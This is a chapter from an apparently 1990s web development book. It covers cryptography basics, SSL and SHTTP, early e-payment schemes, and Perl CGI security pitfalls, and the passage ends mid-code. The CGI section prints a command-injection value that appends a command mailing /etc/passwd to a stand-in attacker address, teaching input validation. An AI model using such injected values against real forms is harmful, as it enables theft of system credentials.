Chapter 25

Transaction Security and Security Administration


Security is a concept quite topical in an Internet that is becoming ever more commercialized. Rival security software schemes battle for control over tomorrow's electronic payment-transaction systems, legal experts worry about what constitutes a nonrepudiation digital signature, and financial service firms worry about malicious Internet entities sniffing out their data packets as they flow from node to node.

In the past, cryptographic techniques centered on repulsing Cold War-style enemy computational attacks on critical network data; nowadays, the interest centers on applying the same numerical methods to real-time transactions involving dollars and cents. From the web developer's point of view, the first order of business should be to understand the basic vocabulary.

The first section of this chapter helps build this vocabulary by covering the building blocks of Web security: Privacy Enhanced Mail (PEM) and its cousin RIPEM, Pretty Good Privacy (PGP), RSA Public-Key Cryptography, Data Encryption Standard (DES), and Digital Signatures. This gives you a good starting place to explore more deeply specific Web-security topics: Netscape Communications Corporation's Secure Sockets Layer (SSL) specification, the competing Secure HTTP (SHTTP) proposal championed by Enterprise Integration Technologies (EIT), the chief concepts underlying various electronic payment systems such as GOST's NetCheque and Digicash's e-cash, and Microsoft's security initiatives (the CryptoAPI). These sections give web developers a clear picture of the tools that various software vendors use to build their security systems; in many cases, developers will be using a secure server and no extra steps are necessary. It's still a good idea, however, to be familiar with secure client-server Web transactions, and there are possibilities for intrepid developers to build their own security-enhanced applications.

The intricacies of data encryption and digital signatures have been well covered in the literature and have been well developed by a number of software firms. It therefore is unrealistic for the individual web developer to approach the problem of secure transactions with one quick hack or another. A more sensible approach is to gain familiarity with the pros and cons of the general security approaches on the Web so that, when the time comes, the developer can recommend the appropriate security tool as an integration package with a set of existing Web site applications. Every Web site lies somewhere on the security spectrum, from totally open (no security) to totally battened down with multiple layers of strict security. No single approach is best; a developer (or the site administrator) can make security determinations only after taking into account end-user requirements, computational resource constraints, and legal (compliance) issues, if applicable. Again, a sound familiarity with the security building blocks helps make a reasonable site- or application-specific security choice.

I then move on to important security issues for the Perl CGI developer. The bad news is that many CGI forms are inherently insecure, but the good news is that untrusted data (such as data filled in on the client side) can be cleaned up before security is breached. Use of Perl on the Windows NT platform carries some new risks, which are explored here.

The chapter concludes with a discussion of Web site administrative issues. I cover two security tools that come with the NCSA httpd distribution: the NCSA htpasswd program and the host-filtering technique. Sample scripts, in both Perl and Expect, are presented to facilitate the administration of applications that require the user to log on with a user ID and password. Because the distinction between application developer and site administrator is sometimes an artificial one on the Web, these techniques are indeed useful ones to present.

Cryptographic Terminology

The issue of secure commercial transactions on the Web is a complex one. In order to appreciate the intense struggle for the commercial marketplace, the developer needs core security vocabulary; I present some of the key terms in the following section.

Data Encryption Standard (DES)

The DES standard was adopted by the U.S. government in 1977 and is suitable for encrypting large amounts of data. (See note) Both the sender and receiver must know the same secret key to encrypt and decrypt the message. Computationally, it's difficult but not impossible for an enemy to decrypt an intercepted message without knowledge of the secret key. There is, however, no convenient way to ship the secret key over a TCP/IP network to authorized participants.

DES therefore is unsuitable by itself for use on the Internet because a network eavesdropper might compromise the secret key as it is being transmitted. There is a way, though, to use DES effectively, as explained in the next section on RSA public-key cryptography.

RSA Public-Key Cryptography

Public-key cryptography, invented in 1976 by Whitfield Diffie and Martin Hellman, solves the network security problem inherent in traditional symmetric cryptographic methods. Consider the case of the sender and the recipient sharing the same secret key (a symmetric key system). It is difficult to communicate this common key over a transmission medium (for example, a telephone line or TCP/IP network) without a significant risk of an unwanted third party compromising the key. If the key is compromised, all subsequent messages in either direction can be decoded by the interloper.

Public-key cryptography is asymmetric; each person who wants to share secure information on the network is given one public key and one private key. The private keys are never transmitted on the network. To send an encrypted message, the sender encrypts it with the recipient's public key, which can be distributed freely, and only the recipient's private key can be used to decrypt it. Therefore, the message can be sent on an insecure transmission medium (for example, the Internet), and eavesdroppers who sniff out the data packets can't benefit because they don't possess the recipient's private key.

In passing, I note here that Sun Microsystems has announced plans for HotJava, its new Web browser, to support network commerce by using public key encryption technology. (See note)

An important related concept is the digital signature. The sender uses his or her private key and the contents of the message itself, and pipes these two pieces of data into an algorithm. The output of the algorithm is the digital signature, which is relatively short (a few hundred bytes long). The recipient can verify the digital signature by using the sender's public key and the message. The digital signature is secure in the sense that it would be virtually impossible for an "enemy" computer to find another message (that is, one distinct from the message actually sent) to produce the identical digital signature; the task is beyond realistic computational limits. Because each user has the responsibility of protecting the private key, the digital signature is nonrepudiable; senders can't claim that they did not send the message in question.
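The sign-and-verify cycle just described can be sketched in a few lines of Perl. This is a toy under loud assumptions: the key pair (n = 3233, e = 17, d = 2753) is the usual textbook example and is far too small for real use, the helper names are my own, and reducing an MD5 digest modulo n is only a stand-in for the padding a real RSA signature scheme uses.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);

# Toy RSA key pair (textbook values, NOT secure): n = 61 * 53.
my ($N, $E, $D) = (3233, 17, 2753);

# Square-and-multiply modular exponentiation on small integers.
sub modpow {
    my ($base, $exp, $mod) = @_;
    my $result = 1;
    $base %= $mod;
    while ($exp > 0) {
        $result = ($result * $base) % $mod if $exp & 1;
        $base   = ($base * $base) % $mod;
        $exp >>= 1;
    }
    return $result;
}

# Reduce the MD5 digest of the message to a number smaller than n.
sub digest_number {
    my ($message) = @_;
    return hex(substr(md5_hex($message), 0, 7)) % $N;
}

# The sender signs with the PRIVATE exponent d.
sub sign_message {
    my ($message) = @_;
    return modpow(digest_number($message), $D, $N);
}

# Anyone holding the PUBLIC exponent e can verify.
sub verify_message {
    my ($message, $signature) = @_;
    return modpow($signature, $E, $N) == digest_number($message) ? 1 : 0;
}

my $message   = "Pay 10 dollars to the seller";
my $signature = sign_message($message);
print "genuine signature accepted: ", verify_message($message, $signature), "\n";
print "altered signature accepted: ",
      verify_message($message, ($signature + 1) % $N), "\n";
```

Note that the private exponent appears only in sign_message; verification needs nothing but the message, the signature, and the public values.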

It's important to realize that, unlike DES, RSA is not an efficient way to encrypt large blocks of data. Therefore, a good hybrid approach to securely transmit a large amount of data is to encrypt the data with DES and then encrypt the DES secret key with the receiver's RSA public key.
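A minimal sketch of this hybrid idea follows. Core Perl ships no DES routine, so a repeating-key XOR stands in for DES here; that substitution, the toy RSA key pair (n = 3233, e = 17, d = 2753), and all the function names are assumptions made purely for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Receiver's toy RSA key pair (textbook values, NOT secure).
my ($N, $E, $D) = (3233, 17, 2753);

# Square-and-multiply modular exponentiation on small integers.
sub modpow {
    my ($base, $exp, $mod) = @_;
    my $result = 1;
    $base %= $mod;
    while ($exp > 0) {
        $result = ($result * $base) % $mod if $exp & 1;
        $base   = ($base * $base) % $mod;
        $exp >>= 1;
    }
    return $result;
}

# Stand-in for DES: XOR every byte with a repeating 2-byte key.
# The same call both encrypts and decrypts.
sub toy_symmetric {
    my ($data, $session_key) = @_;
    my @key = unpack("C*", pack("n", $session_key));
    my $i = 0;
    return join "", map { chr(ord($_) ^ $key[$i++ % @key]) } split //, $data;
}

# Sender: pick a random secret key, encrypt the bulk data with it,
# and wrap the secret key with the receiver's PUBLIC key.
sub hybrid_encrypt {
    my ($plaintext) = @_;
    my $session_key = 1 + int(rand($N - 1));    # 1 .. n-1
    my $wrapped_key = modpow($session_key, $E, $N);
    return ($wrapped_key, toy_symmetric($plaintext, $session_key));
}

# Receiver: unwrap the secret key with the PRIVATE key, then decrypt.
sub hybrid_decrypt {
    my ($wrapped_key, $ciphertext) = @_;
    my $session_key = modpow($wrapped_key, $D, $N);
    return toy_symmetric($ciphertext, $session_key);
}

my ($wrapped, $ciphertext) = hybrid_encrypt("A large block of data");
print "recovered: ", hybrid_decrypt($wrapped, $ciphertext), "\n";
```

Only the short secret key passes through the slow public-key step; the bulk of the data is handled by the fast symmetric step.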

Kerberos

The Kerberos network authentication system was developed at MIT in 1985 and 1986. (See note) Dr. Barry Neuman, of NetCheque fame (NetCheque is an electronic payment system discussed briefly later in this chapter) and now at the University of Southern California, was one of the principal designers. Kerberos provides tickets (for network identification) and secret cryptographic keys (for secure network communication) to users or services on the network. The ticket, a few hundred characters long, is embedded in network protocols such as FTP or Telnet, and is used with the secret keys to mutually authenticate a network connection. The RSA Labs FAQ points out that Kerberos keeps a central database of the secret keys; therefore, in contrast to a digitally signed message provided by RSA technology, a Kerberos-authenticated message would not be legally secure. The sender could claim that the central database had been compromised.

Pretty Good Privacy (PGP) and Privacy-Enhanced Mail (PEM)

Both PGP and PEM are programs to communicate securely on the network; they both use RSA encryption techniques. The U.S. government controls the export of RSA encryption technology and, in fact, classifies some of the algorithms in the same category as munitions. Munitions often wind up in the wrong place, though, and so do the RSA code and applications that use it, such as PGP and PEM. These packages have found their way to Europe and Asia.

PGP, according to author Phil Zimmermann, is now a "worldwide de-facto standard for e-mail encryption" and can handle other kinds of data transfer as well. A commercial concern, ViaCrypt, sells the commercial version of PGP; in addition, an Internet version is freely available. (See note)

NCSA httpd and PGP/PEM

Some work has been done to implement both PGP and PEM protocols with the NCSA httpd server and the NCSA Mosaic client, having the server and the client "hook" into the RSA encryption routines to implement security. The initial work, however, did not establish a certificate authority or a trusted public key repository, so the developers did not have a simple solution for how the sender and recipient could exchange their public keys with certainty. If a bogus public key is forged and accepted by a recipient, the forger can send bogus e-mail using the false public key and fool the recipient. For a more mature outlook on this theme, see the section "Secure NCSA httpd."

Riordan's Privacy-Enhanced Mail (RIPEM)

Mark Riordan has written RIPEM, a software package to "sign" documents or data, and to encrypt and decrypt them. The RIPEM package allows users to do the following: (See note)

RIPEM, because it uses RSA code, is subject to the same export restrictions as PGP and PEM. It has been ported to many platforms (UNIX, Microsoft Windows, Macintosh, and so on) and is supported by some popular mail packages, for example, the freely available GNU Emacs mail program and Elm.

The fingerprint is a variant of the digital signature discussed previously in the RSA section. It often is called an MD5 fingerprint, after the MD5 message-digest algorithm used to compute it, and it is present, for example, in a RIPEM-enhanced FTP file. The sender's public key can be used to decrypt the MD5 fingerprint (and this public key is available from the RIPEM repository or by issuing a blind Finger command to the sending machine). The fingerprint is encrypted with the sender's private key and can't be forged by network eavesdroppers. Again, as with RSA, the basic security precaution is for all network participants to securely store their private keys. RIPEM never transmits them over TCP/IP wires. RIPEM is quite different from PGP; they are noninteroperable. Over time, standards committees might address the issue of differences among the range of Internet security offerings and find a middle ground to bring the packages closer together.

It's time for a practical example! Figure 25.1 shows an FTP document received by a Web client from the Internet Multicasting Service's town.hall.org machine.

Figure 25.1 : A corporate filing, retrieved by FTP from the IMS town.hall.org machine. Note the MD5 fingerprint at the top of the document.

This is an interesting example of RIPEM document fingerprinting. The IMS anticipates public policy questions such as, "How can we be sure that the corporate filing we retrieve over the Internet is indeed the same one you are storing on your system?" and answers them with this process:

Note that without the client RIPEM software installed, the fingerprint can't be processed. An interesting empirical finding is that users have reported RIPEM validation failure after doing a File Save As on a filing using a Web browser; the File Save As procedure quite possibly could alter one or more bytes (for example, it might lose a line feed character). If the filing is FTPed from the town.hall.org site, however, the RIPEM validation runs cleanly.
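The sensitivity to a single lost byte is easy to demonstrate with Perl's Digest::MD5 module. The sketch below computes only the plain MD5 digest; it does not reproduce RIPEM's signing step or file format, and the filing text is a made-up placeholder.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);

# Return the MD5 digest of a byte string as 32 hexadecimal digits.
sub fingerprint {
    my ($data) = @_;
    return md5_hex($data);
}

# Hypothetical filing text: the second copy has lost its final line feed,
# as might happen after a browser's File Save As.
my $as_served = "FORM 10-K\nAnnual report\n";
my $as_saved  = "FORM 10-K\nAnnual report";

print "served: ", fingerprint($as_served), "\n";
print "saved:  ", fingerprint($as_saved),  "\n";
print "match:  ",
      (fingerprint($as_served) eq fingerprint($as_saved) ? "yes" : "no"), "\n";
```

Because the digest depends on every byte, the two copies yield different fingerprints, and any validation that compares them fails.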

Netscape Communications Corporation's Secure Sockets Layer (SSL)

The Netscape SSL protocol is designed to sit between the TCP/IP network backbone and application protocols such as HTTP, Network News Transfer Protocol (NNTP), FTP, and Telnet.

Simply put, the Netscape Navigator browser has a new URL access method, https, to connect to Netscape servers using SSL. The URL would be specified as https://machine/path/file, and the default port number for the client/server connection is 443 (rather than port 80 for generic HTTP). (Just in case you were wondering, the new port was assigned by the Internet Assigned Numbers Authority, or IANA.) Just as with RSA code, the SSL cryptographic scheme is subject to export restrictions, and the key size in exported versions is limited to 40 bits. The Netscape standards documentation estimates that a message encrypted with a 40-bit key would take a 64-MIPS machine one full year of dedicated processor time to break, which isn't computationally secure but safe enough for most commercial customers. For U.S. customers, the Netscape server uses a 128-bit encryption key, whose key space is 2^88 times larger than that of the 40-bit key.
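The scheme-to-port rule can be sketched as a small URL parser. The function name and the deliberately simple pattern are my own assumptions; a production script would more likely rely on a dedicated URL-handling module.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Default ports named in the text: 80 for http, 443 for https.
my %DEFAULT_PORT = (http => 80, https => 443);

# Split a URL into (scheme, host, port, path), filling in the default
# port when the URL does not name one. Returns an empty list on failure.
sub parse_url {
    my ($url) = @_;
    my ($scheme, $host, $port, $path) =
        $url =~ m{^(https?)://([^/:]+)(?::(\d+))?(/.*)?$}i
        or return;
    $scheme = lc $scheme;
    $port = $DEFAULT_PORT{$scheme} unless defined $port;
    $path = "/" unless defined $path;
    return ($scheme, $host, $port, $path);
}

for my $url ("http://machine/path/file", "https://machine/path/file") {
    my ($scheme, $host, $port, $path) = parse_url($url);
    print "$url -> connect to $host on port $port\n";
}
```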

SSL's role in a client/server connection is to encrypt outbound and decrypt inbound packets of a protocol-specific datastream (for example, HTTP, FTP, or Telnet). Therefore, network eavesdroppers always would see fully encrypted data packets, whether they are credit card numbers or HTTP authorization information such as user IDs and passwords (see the following section on NCSA htpasswd).

Recently, Netscape has developed a Secure Sockets Library that emulates the sockets API supported by UNIX, Macintosh System 7, and Microsoft Windows. Its developers have integrated the SSL into the Winsock 2.0 specification, so programmers used to the Winsock specification easily can take advantage of SSL functions. Developers can take existing applications that are Winsock-compliant and convert them with a minimum of trouble to a secure version.

These proactive enhancements to the Secure Sockets Layer are a strong sign that Netscape very much wants SSL to become the dominant security protocol. Netscape has submitted SSL to the W3C working group on security; the jury is still out on its status.

Secure NCSA httpd

Enterprise Integration Technologies (EIT), RSA Labs, and the National Center for Supercomputing Applications (NCSA), three familiar players in web development, offer an extension to httpd: Secure NCSA httpd. (See note)

On the server side, an SHTTPD server can be configured through special SHTTP header directives and local server configuration files. On request, the server uses the RSA private key to generate a digital signature, and this signature, along with the server's public key certificate, is delivered to the client. The client uses the certificate to verify the digital signature. Control of server signature and/or encryption can be via CGI program SHTTP message headers.

On the client side, there is Secure WWW browser software, which can submit secure requests with a client public key. The Secure httpd server uses the client public key to verify the client request and then can decrypt it.

Extra CGI environmental variables now are available for web developers who want to write CGI programs in the Secure NCSA httpd environment. Web developers can query the security properties of an incoming client request. They can ask questions such as, "Is it signed (and if so, who is the signer)," "Is it encrypted," and "What is the client public key?"

In general, the SHTTP protocol purposefully stays within narrow boundaries; it defines new security message headers and therefore enhances the HTTP protocol, which governs communications between WWW client and server. The specification is nonproprietary, but the first reference implementation contains licensed code from EIT, RSA, and NCSA. (See note) The reference implementation includes a secure browser (Secure NCSA Mosaic) as well as a secure server (Secure NCSA httpd). Because the entire concept rests on public key cryptography, it is necessary to create an authority (CommerceNet in the EIT-NCSA-RSA effort) to certify member keys.

As the FAQ states, EIT is not curtailing independent efforts to develop other implementations of SHTTP. On the contrary, third parties are welcome to develop client/server applications that support the SHTTP protocol. SHTTP pays attention to interoperability issues; the protocol supports RSA cryptographic standards, PEM, and clients and servers using different standards. Because RSA code is not available for unrestricted export, Europeans might have to use weaker (shorter) keys, and SHTTP can handle the key-size mismatch.

Comments on the SHTTP Protocol and SSL from a Developer's Perspective

There is a major war between the formidable corporate forces backing SHTTP (EIT and CommerceNet) and the equally daunting Netscape Communications Corporation's Secure Sockets Layer specification. Both ideas have strong technical foundations, but there is no clear consensus yet on which technique will achieve "most favored status" with the evolving WWW security standards. Taking into consideration the murky atmosphere of this conflict, I recommend that the web developer straddle the fence and read source material on both proposals. In general, it should not be too difficult to implement a client/server application using SHTTP protocol, because the CGI extensions make intuitive sense. Developers who want to experiment with SSL will face a steeper learning curve, but this might be time well spent if standards committees decide on SSL as the basis for next-generation Web security.

Electronic Commerce: Security Considerations

Instead of bemoaning the commercialization of the Internet, some groups want to control its basic operations: the standards by which payment is transferred electronically between buyer and seller. It is useful to review briefly the security ideas underlying the major factions. From the developer's standpoint, this information is useful, because one day an application might have to integrate into third-party commerce software, so a little glimpse into the modus operandi of electronic commerce software is called for here.

NetCheque and NetCash

Barry Neuman, in conjunction with Gennady Medvinsky at the University of Southern California's Global Operating Systems Technology (GOST) group, has developed NetCheque, which is billed as "well suited for clearing micropayments." Why? Because NetCheque uses the Kerberos authentication algorithm to verify digital signatures on the electronic checks, and the argument here is that conventional cryptography techniques of Kerberos are more computationally efficient (that is, faster) than public key cryptographic systems. Neuman et al. envision an Internet of millions of micropayments where response time is of the essence. Naturally, critics would argue that the security of public-key systems is greater (see the previous discussion on Kerberos). NetCash is billed as an untraceable financial instrument that preserves the participants' anonymity; buyers and sellers can choose NetCheque or NetCash, depending on the level of anonymity desired. The trade-off for anonymity is that more computational resources are required of the currency server.

The authors argue that the efficiency of NetCheque will lead to Internet services "that charge small fees, on the order of pennies, for access to information, processing queries, and consumption of resources. Such services are a critical component of electronic commerce." (See note)

First Virtual

The novelty in First Virtual Holdings' approach to the security problem of transmitting credit card and other sensitive data across the Internet is that they don't! FV handles credit card clearing off-line with the information technology resources of Electronic Data Systems (EDS), Inc. Therefore, it avoids the issue of encryption, public-key or otherwise, by circumventing the issue. Buyers and sellers register with FV, and FV handles the clearance of information product transactions. If buyers declare that they are not satisfied with the information product, the transaction is voided. And, because it is an information product (such as software) and not a physical good, the marginal cost to the seller of buyer dissatisfaction is very low.

The bright side of FV is zero security risk; the dark side of its scheme is its high transaction cost. It bills a 29-cent fee and two percent of the transaction cost to the buyer for each transaction, and it bills sellers $1 for each aggregated deposit that is made to their account. (See note)
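To see why the cost is called high, the per-transaction fee can be worked out in integer cents. The function name and the round-to-nearest-cent rule (halves round down in this integer form) are assumptions of this sketch; the text gives only the 29-cent and two-percent figures.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Per-transaction fee in cents: a flat 29 cents plus two percent of the
# purchase amount. Rounding of the two-percent part is an assumption.
sub fv_fee_cents {
    my ($amount_cents) = @_;
    return 29 + int(($amount_cents * 2 + 50) / 100);
}

for my $amount_cents (100, 1000, 10000) {
    my $fee = fv_fee_cents($amount_cents);
    printf "purchase \$%.2f -> fee \$%.2f (%.1f%% of the purchase)\n",
        $amount_cents / 100, $fee / 100, 100 * $fee / $amount_cents;
}
```

On a one-dollar information product the fee comes to 31 cents, which is why small purchases bear the heaviest relative cost under this schedule.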

A final note about FV: Nathaniel Borenstein, the primary author of the famous Internet MIME standard, is FV's chief scientist.

Figure 25.2 shows the First Virtual home page.

Figure 25.2 : First Virtual Holdings, Incorporated wants to be your electronic commerce provider.

Digicash's E-Cash

David Chaum is another computer science titan (I'm not just saying this because he taught at NYU) who, with shades of Nathaniel Borenstein, would like to take a substantial market share in the realm of electronic payment. Chaum's company, Digicash, has an entirely different scheme in mind than First Virtual or NetCheque, however. (See note) The Digicash vision of E-cash is that of a digital signature; yes, he proposes using public-key cryptography.

A bank can furnish its public key to all participants, for example. Then, any message from the bank, encoded with the bank's private key, can be decoded by the recipient(s).

To purchase an item, the buyer generates a random number (using Digicash software) and then the number is "blinded" and transmitted to the bank. The bank authenticates the transmission, debits the money from the buyer's account, and digitally signs the blinded note. A confirmation is sent back to the user and the digitally signed bank authorization is forwarded to the seller. The seller can verify the bank's digital signature and the buyer can unblind the confirmation.
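The blind, sign, unblind, and verify steps can be sketched with a textbook RSA blind signature. The chapter does not spell out Digicash's actual algorithm, so treat the choice of RSA blinding, the toy bank key (n = 3233, e = 17, d = 2753), and every function name below as assumptions made for illustration; account debiting and the double-spending challenge are left out.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Bank's toy RSA key pair (textbook values, NOT secure).
my ($N, $E, $D) = (3233, 17, 2753);

# Square-and-multiply modular exponentiation on small integers.
sub modpow {
    my ($base, $exp, $mod) = @_;
    my $result = 1;
    $base %= $mod;
    while ($exp > 0) {
        $result = ($result * $base) % $mod if $exp & 1;
        $base   = ($base * $base) % $mod;
        $exp >>= 1;
    }
    return $result;
}

# Modular inverse via the extended Euclidean algorithm.
sub modinv {
    my ($value, $mod) = @_;
    my ($old_r, $r) = ($value % $mod, $mod);
    my ($old_s, $s) = (1, 0);
    while ($r != 0) {
        my $q = int($old_r / $r);
        ($old_r, $r) = ($r, $old_r - $q * $r);
        ($old_s, $s) = ($s, $old_s - $q * $s);
    }
    die "no inverse: values are not coprime\n" unless $old_r == 1;
    return $old_s % $mod;
}

# Buyer: hide the note number behind a secret blinding factor.
sub blind_note {
    my ($note, $factor) = @_;
    return ($note * modpow($factor, $E, $N)) % $N;
}

# Bank: sign whatever arrives, without ever seeing the note number.
sub bank_sign {
    my ($blinded) = @_;
    return modpow($blinded, $D, $N);
}

# Buyer: strip the blinding factor to obtain the bank's signature on the note.
sub unblind {
    my ($blinded_signature, $factor) = @_;
    return ($blinded_signature * modinv($factor, $N)) % $N;
}

# Seller: check the signature with the bank's public key.
sub verify_note {
    my ($note, $signature) = @_;
    return modpow($signature, $E, $N) == $note ? 1 : 0;
}

my ($note, $factor) = (1234, 7);    # factor must be coprime to n
my $signature = unblind(bank_sign(blind_note($note, $factor)), $factor);
print "seller accepts note: ", verify_note($note, $signature), "\n";
```

The bank signs a value that reveals nothing about the note number, yet the unblinded result is exactly the signature the bank would have produced on the note itself.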

Digicash has anticipated the security loophole of having an unethical user try to spend the same "note" twice by having the seller's machine issue an unpredictable (that is, always changing) challenge to the buyer's machine. The response does not reveal the buyer's identity. On the second go-round, though, the challenge response does expose the user's fraud.

From a public policy viewpoint, the blinding process means payment anonymity. More so than with conventional cash or checks, the seller cannot trace the payment back to the buyer.

The marketing challenge, naturally, is whether Chaum et al. can convince a leery public that their cryptographic methods are truly secure and that it makes sense economically to choose this method instead of the credit card off-line approaches of First Virtual, for example.

Digicash's initial strategy is to download its E-cash software to sellers and buyers; transfer of CyberBucks (its term) is handled by the software. It has created an E-cash logo for compliant electronic shops. Once again, though, this battle is in its initial stages.

Microsoft's Security Initiatives

Microsoft has been quite busy in 1996 writing Internet draft security proposals and public white papers on a series of related topics. (See note) It might seem surprising that Microsoft, given its history of proprietary software solutions, would be so aggressive in the public arena on security, but this is consistent with its recent reorganization, which focuses on winning Web market share (both server and client) from Netscape. If Microsoft can push its protocols in a public forum and gain acceptance, it also will win over third-party developers and create a snowball effect. The situation is quite paradoxical: the Web is billed as a sandbox where everybody can play, yet individual vendors somehow must distinguish themselves as offering technically superior solutions. This section examines three of Microsoft's major security fronts: the Cryptographic API (CryptoAPI) toolkit for simple end-user cryptography, the Secure Electronic Transactions (SET) framework for Internet commerce, and code-signing specifications set so that software consumers can trust downloaded software programs as if they were shrink wrapped and purchased at a retail outlet.

The CryptoAPI toolkit  Microsoft distinguishes tools available to the developer (the CryptoAPI) from the numerical cryptographic functions, such as key generation, digital signatures, and message hashing. It isolates the functions into separate modules, called Cryptographic Service Providers (CSPs). Therefore, the mathematical details are abstracted away from the developer and, furthermore, several CSPs can be registered for use. Interchangeability of CSPs is important to give the developer maximum flexibility. In certain situations, for example, a software-based (algorithmic) CSP can be used, whereas for even more security, a second hardware-based (smart cards) CSP might be chosen. Microsoft will build a default CSP into the operating system: an in-house variant of RSA public-key technology.

The Secure Electronic Transactions (SET) framework  SET is a protocol to allow bank-card payments over the Internet. The SET protocol was introduced by MasterCard and VISA, with technical assistance from Microsoft, Netscape, IBM, GTE, and other major companies. The white paper, at http://www.visa.com/cgi-bin/vee/sf/set/intro.html, indicates that the major proponents will provide reference code in late 1996 so that other credit-card companies, for example, can implement the SET protocol. SET uses digital certificates to authenticate the bank-card holder, the merchant, and the merchant's financial institution, that is, all the parties in an electronic transaction. Microsoft targets 1997 as the first year in which end-user SET compliant software will be available.

Code-signing specifications  Microsoft has built code-signing support into its Web browser, Internet Explorer (versions 3 and higher). The software vendor can use tools (which still are in their initial forms, for example, in Microsoft's ActiveX Software Development Kit) to sign the code. The social reasons for the code-signing procedure are twofold: to provide accountability (authorship) and consumer peace of mind (the underlying cryptographic techniques verify that the code has not been tampered with between the time it was signed and the time the Web browser downloaded it). Microsoft has indicated that all its development tools are slated to be augmented with a code-signing function.

Comments on Electronic-Payment Systems

A fascinating and frenetic conflict is raging, with many millions of dollars at stake. I advise the web developer to try to code simple applications that can hook into one or more schemes without becoming beholden to any one scheme. The dust is far from settled here; the differences and the stakes are orders of magnitude greater than the SHTTP versus SSL war that I discussed earlier in this chapter.

I only hope that nonproprietary (fully open) standards will rule the day in the security arena, a win-win situation for vendors and developers who all have equal access to the security protocol (export restrictions notwithstanding) and the underlying HyperText Transfer Protocol.

Now the discussion turns to more practical, immediate matters for the CGI Perl developer: how to avoid falling into common Web security traps and how to use the inherent security properties of the NCSA httpd server.

Security Pitfalls of CGI Programming

The most common mistake a CGI programmer can make is to trust the data the user is inputting into a CGI form. Often, the CGI forms fork a subshell; for example, the following line might be present in a form-mail program:

system("/usr/lib/sendmail $form_address < $input_file");

The problem is that the system call starts a subshell; however, there is no guarantee that the $form_address variable cannot be manipulated by a malicious user to do a lot more than the programmer bargained for. Consider this value of $form_address:

"legit-id@good.box.com;mail badguy@badguy.box.com < /etc/passwd"

In this case, the bad guy has used the semicolon to append a command to mail himself the system's password file.

The general rule is that you should not fork a subshell if the CGI script is passing untrusted data to it. In Perl, the system command is not the only possible culprit; the following commands also invoke a shell: (See note)

Opening to a pipe  For example, open(OUT, "|program $prog_args");

Commands in backticks  For example, `program $args`;

The exec statement  For example, exec("program $args");

Therefore, the CGI programmer can sidestep problems by keeping these two practices in mind:

Do not pass untrusted data to the shell.
In programs that run externally with arguments, check the arguments to make sure that they do not contain metacharacters.
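Both practices can be sketched together: a metacharacter check, followed by an argument list that never touches the shell. The function names and the particular set of characters (aimed at Bourne-style shells, with whitespace treated as suspicious) are assumptions for illustration; adjust the set for your own shell and platform.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# True if the value contains a character that a Bourne-style shell
# treats specially (whitespace included).
sub has_shell_metachars {
    my ($value) = @_;
    return $value =~ /[;&|<>`\$\\"'*?~^(){}\[\]!#\s]/ ? 1 : 0;
}

# Build an argument LIST for sendmail. Handing a list (not one string)
# to system() or exec() bypasses the shell, so nothing is reinterpreted.
# A leading hyphen is refused so the address cannot pose as an option.
sub sendmail_args {
    my ($address) = @_;
    return if has_shell_metachars($address);
    return if $address =~ /^-/;
    return ("/usr/lib/sendmail", $address);
}

my @samples = (
    'legit-id@good.box.com',
    'legit-id@good.box.com;mail badguy@badguy.box.com < /etc/passwd',
);
for my $address (@samples) {
    my @args = sendmail_args($address);
    print @args ? "would run: @args\n" : "rejected: $address\n";
    # A real script would then call: system(@args) == 0 or die ...;
}
```

The check and the list form are complementary: the first rejects suspicious input outright, and the second ensures that whatever does get through is passed to the program as a single literal argument.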

Guarding against the traps posed by untrusted data is analogous to the security methods built into Perl 5 setuid scripts (scripts that run with the privileges of the owner). In Perl 5 setuid scripts, any command-line argument, environmental variable, or input is defined as tainted, and as the Perlsec manual page says, "may not be used directly or indirectly, in any command that invokes a subshell, or in any command that modifies files, directories, or processes." In the CGI world, it is desirable to force taint checks; in Perl 5, the -T command-line flag is used when starting the Perl interpreter. The Perlsec manual page shows how to follow my advice; for example, I replace this line:

system "echo $foo"; # insecure, $foo is tainted

with this line:

system "/bin/echo", $foo; # secure, does not use shell

I do not trust the assignment

$path = $ENV{'PATH'};

Instead, I explicitly set the path in the script with a line such as this:

$ENV{'PATH'} = '/bin:/usr/bin';
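Putting these pieces together, a script intended to run under -T might begin along the following lines. This is a sketch: the untaint_word helper and its narrow pattern are my own assumptions, and the fallback value merely lets the script run outside a Web server. The environment cleanup follows the advice in the perlsec manual page.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Give child processes a known, minimal environment.
$ENV{'PATH'} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Untaint a value by capturing it with a deliberately narrow pattern.
# Under -T, only text extracted through a regex capture is trusted.
sub untaint_word {
    my ($value) = @_;
    return unless defined $value;
    return $value =~ /^([A-Za-z0-9_]{1,32})\z/ ? $1 : undef;
}

# QUERY_STRING is set by the Web server; fall back to a sample value
# so the sketch can also be run from the command line.
my $raw  = defined $ENV{'QUERY_STRING'} ? $ENV{'QUERY_STRING'} : 'hello';
my $word = untaint_word($raw);

if (defined $word) {
    system "/bin/echo", $word;    # list form: no shell is involved
} else {
    print "Rejected input\n";
}
```

The narrower the pattern, the better; a capture such as (.*) would untaint anything and defeat the purpose of the check.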

Paul Phillips provides the following example, which is part of a CGI mail form:

open(MAIL, "|/usr/lib/sendmail -t");
print MAIL "To: $recipient\n";

The $recipient variable is untrusted, so I should check this variable for shell metacharacters first by using this code:

# Accept only letters, digits, and the characters - _ . @ over the whole string.
unless ($recipient =~ /^[-a-zA-Z0-9_.@]+\z/) {
    print "Failed validation check!";
    print "Invalid characters used in recipient : $recipient";
    exit 1;
}

Tip
The developer is responsible for devising the proper regular expression to scan for shell metacharacters; note that this is very much dependent on the given shell! It is also highly operating-system specific. Servers running Windows NT will have an entirely different range of suspicious characters than UNIX machines, for example.

Eric Tall tested the readers by passing untrusted data to an external program in Chapter 24's make_button Perl script. Now he will fix it for us. Consider the following lines from make_button.pl:

# See Chapter 24 for a discussion of the following statement.
$text =~ s/[^a-zA-Z0-9]//g;
if($text ne "")
{eval `pbmtext "$text" | pnmcrop -white | pnmpad -white -t3 -b3 -l3 -r3 |
